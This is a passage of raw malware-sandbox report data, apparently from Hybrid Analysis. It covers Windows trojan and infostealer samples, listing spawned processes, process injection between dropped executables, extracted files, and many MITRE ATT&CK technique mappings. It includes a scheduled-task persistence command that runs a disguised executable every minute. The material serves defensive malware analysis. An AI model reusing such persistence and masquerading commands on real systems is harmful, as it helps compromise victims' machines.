"https://attack.mitre.org/techniques/T1106"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "target-14", "type": 9, "relevance": 8, "name": "Spawns a lot of processes", "description": "Spawned process \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" (UID: 00000000-00002180)\n Spawned process \"bucei.exe\" (UID: 00000000-00005888)\n Spawned process \"cmd.exe\" with commandline \"/c \"\"%TEMP%\\\\_vslite.bat\" \"\" (UID: 00000000-00004204)\n Spawned process \"bytudy.exe\" with commandline \"OK\" (UID: 00000000-00003640)\n Spawned process \"syzoe.exe\" (UID: 00000000-00000328)\n Spawned process \"cmd.exe\" with commandline \"/c \"\"%TEMP%\\\\_vslite.bat\" \"\" (UID: 00000000-00000336)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\bucei.exe\" (Handle: 656)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\bucei.exe\" (Handle: 656)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\bucei.exe\" (Handle: 656)\n \"bucei.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\bytudy.exe\" (Handle: 684)\n \"bucei.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\bytudy.exe\" (Handle: 684)\n \"bucei.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\bytudy.exe\" (Handle: 684)\n \"bytudy.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\syzoe.exe\" (Handle: 860)\n \"bytudy.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\syzoe.exe\" (Handle: 860)\n \"bytudy.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\syzoe.exe\" (Handle: 860)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Network Related", "identifier": "network-7", "type": 7, "relevance": 7, "name": "Uses network protocols on unusual ports", "description": "TCP traffic to <IPv4> on port 11110\n TCP traffic to <IPv4> on port 11170\n TCP traffic to <IPv4> on port 11110\n TCP traffic to <IPv4> on port 11110", "origin": "Network Traffic", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac
https://hybrid-analysis.com/sample/3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac
Hybrid Analysis - Infostealers
{"size": 2114136, "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "submit_name": "3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac", "sha256": "3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac", "av_detect": 89, "vx_family": "Trojan.Generic", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_network_connections": 1, "total_processes": 6, "total_signatures": 392, "extracted_files": [{"name": "vnc.exe", "file_path": "%TEMP%\\vnc.exe", "file_size": 415232, "sha256": "4e8a99cd33c9e5c747a3ce8f1a3e17824846f4a8f7cb0631aebd0815db2ce3a4", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe (PID: 5916)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "windef.exe", "file_path": "%TEMP%\\windef.exe", "file_size": 357376, "sha256": "7050608d53f80269df951d00883ed79815c060ce7678a76b5c3f6a2a985beea9", "type_tags": ["peexe", "assembly", "executable"], "description": "PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows", "runtime_process": "3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe (PID: 5916)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "SystemPropertiesPerformance.exe", "file_path": "%USERPROFILE%\\btpanui\\SystemPropertiesPerformance.exe", "file_size": 2114144, "sha256": "cac0fb00d2eacafde6742d0e4795d142ced7d7f6668eb08d9f23628bd51a1ef2", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe (PID: 5916)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "winsock.exe", "file_size": 357376, "sha256": "7050608d53f80269df951d00883ed79815c060ce7678a76b5c3f6a2a985beea9", "type_tags": ["peexe", "assembly", "executable"], "description": "PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "file_metadata": {"file_compositions": ["1 .OBJ Files (COFF) linked with LINK.EXE 12.00 (Visual Studio UNRELEASED) (build: 31101)", "1 Unknown Resource Files (build: 0)", "1 .RES Files linked with CVTRES.EXE 12.00 (Visual Studio UNRELEASED)! (build: 21005)", "1 .ASM Files assembled with MASM 12.00 (Visual Studio UNRELEASED) (build: 31101)", "80 .CPP Files (with POGO Optimization) compiled with CL.EXE 18.00 (Visual Studio UNRELEASED) (build: 31101)"], "imported_objects": ["37 .LIB Files generated with LIB.EXE 9.00 (Visual Studio 2008) (build: 30729)", "9 .C Files compiled with CL.EXE 15.00 (Visual Studio 2008) (build: 30729)", "53 .CPP Files compiled with CL.EXE 18.00 (Visual Studio UNRELEASED) (build: 21005)", "177 .C Files compiled with CL.EXE 18.00 (Visual Studio UNRELEASED) (build: 21005)", "51 .ASM Files assembled with MASM 12.00 (Visual Studio UNRELEASED) (build: 21005)", "1 .OBJ Files linked with ALIASOBJ.EXE 11.00 (Internal OLDNAMES.LIB Tool) (build: 41118)", "2 .CPP Files compiled with CL.EXE 18.00 (Visual Studio UNRELEASED) (build: 20806)"], "file_analysis": ["File contains C++ code", "File contains assembly code", "File appears to contain raw COFF/OMF content", "File was optimized using LTCG and/or POGO", "File is the product of a medium codebase (81 files)"], "total_file_compositions_imports": 544}, "processes": [{"uid": "00000000-00005916", "name": "3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe", "normalized_path": "C:\\3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe", "sha256": "3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac"}, {"uid": "00000000-00006112", "parentuid": "00000000-00005916", "name": "vnc.exe", "normalized_path": "%TEMP%\\vnc.exe", "sha256": "4e8a99cd33c9e5c747a3ce8f1a3e17824846f4a8f7cb0631aebd0815db2ce3a4"}, {"uid": "00000000-00005856", "parentuid": "00000000-00006112", "name": "svchost.exe", "normalized_path": "%WINDIR%\\system32\\svchost.exe", "command_line": "-k", "sha256": "121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2"}, {"uid": "00000000-00006132", "parentuid": "00000000-00005916", "name": "windef.exe", "normalized_path": "%TEMP%\\windef.exe", "sha256": "7050608d53f80269df951d00883ed79815c060ce7678a76b5c3f6a2a985beea9"}, {"uid": "00000000-00006108", "parentuid": "00000000-00005916", "name": "3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe", "normalized_path": "C:\\3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe", "sha256": "3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac"}, {"uid": "00000000-00004040", "parentuid": "00000000-00005916", "name": "schtasks.exe", "normalized_path": "%WINDIR%\\System32\\schtasks.exe", "command_line": "/create /tn RtkAudioService64 /tr \"%USERPROFILE%\\btpanui\\SystemPropertiesPerformance.exe\" /sc minute /mo 1 /F", "sha256": "15018d0093befabba8b927743191030d1f8c17bb97fdb48c2fc3eab20e2d4b3d"}], "mitre_attcks": [{"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 7, "informative_identifiers_count": 19}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 2}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 6}, {"tactic": "Execution", "technique": "Windows Management Instrumentation", "attck_id": "T1047", "attck_id_wiki": "https://attack.mitre.org/techniques/T1047", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Execution", "technique": "Component Object Model", "attck_id": "T1559.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}}, {"tactic": "Execution", "technique": "Scheduled Task", "attck_id": "T1053.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1053/005", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "parent": {"technique": "Scheduled Task/Job", "attck_id": "T1053", "attck_id_wiki": "https://attack.mitre.org/techniques/T1053"}}, {"tactic": "Persistence", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 2, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Shortcut Modification", "attck_id": "T1547.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/009", "informative_identifiers_count": 2, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "Scheduled Task", "attck_id": "T1053.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1053/005", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "parent": {"technique": "Scheduled Task/Job", "attck_id": "T1053", "attck_id_wiki": "https://attack.mitre.org/techniques/T1053"}}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Persistence", "technique": "Kernel Modules and Extensions", "attck_id": "T1547.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/006", "malicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "suspicious_identifiers_count": 4, "informative_identifiers_count": 4, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Create Process with Token", "attck_id": "T1134.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/002", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 4, "suspicious_identifiers_count": 3, "informative_identifiers_count": 4}, {"tactic": "Privilege Escalation", "technique": "Process Hollowing", "attck_id": "T1055.012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/012", "malicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 2, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Shortcut Modification", "attck_id": "T1547.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/009", "informative_identifiers_count": 2, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Bypass User Account Control", "attck_id": "T1548.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548/002", "informative_identifiers_count": 1, "parent": {"technique": "Abuse Elevation Control Mechanism", "attck_id": "T1548", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548"}}, {"tactic": "Privilege Escalation", "technique": "Abuse Elevation Control Mechanism", "attck_id": "T1548", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Scheduled Task", "attck_id": "T1053.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1053/005", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "parent": {"technique": "Scheduled Task/Job", "attck_id": "T1053", "attck_id_wiki": "https://attack.mitre.org/techniques/T1053"}}, {"tactic": "Privilege Escalation", "technique": "Portable Executable Injection", "attck_id": "T1055.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/002", "malicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Kernel Modules and Extensions", "attck_id": "T1547.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/006", "malicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Exploitation for Privilege Escalation", "attck_id": "T1068", "attck_id_wiki": "https://attack.mitre.org/techniques/T1068", "suspicious_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Make and Impersonate Token", "attck_id": "T1134.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/003", "suspicious_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "suspicious_identifiers_count": 2, "informative_identifiers_count": 6}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "suspicious_identifiers_count": 4, "informative_identifiers_count": 4, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Create Process with Token", "attck_id": "T1134.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/002", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "informative_identifiers_count": 3, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 2, "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 3, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070", "suspicious_identifiers_count": 2, "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 4, "suspicious_identifiers_count": 3, "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Process Hollowing", "attck_id": "T1055.012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/012", "malicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 4, "informative_identifiers_count": 11}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Disable or Modify Tools", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 3, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Bypass User Account Control", "attck_id": "T1548.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548/002", "informative_identifiers_count": 1, "parent": {"technique": "Abuse Elevation Control Mechanism", "attck_id": "T1548", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548"}}, {"tactic": "Defense Evasion", "technique": "Abuse Elevation Control Mechanism", "attck_id": "T1548", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "suspicious_identifiers_count": 2, "informative_identifiers_count": 7}, {"tactic": "Defense Evasion", "technique": "Portable Executable Injection", "attck_id": "T1055.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/002", "malicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Match Legitimate Name or Location", "attck_id": "T1036.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/005", "malicious_identifiers_count": 1, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 2, "informative_identifiers_count": 2, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Reflective Code Loading", "attck_id": "T1620", "attck_id_wiki": "https://attack.mitre.org/techniques/T1620", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Dynamic API Resolution", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Indicator Removal from Tools", "attck_id": "T1027.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/005", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense 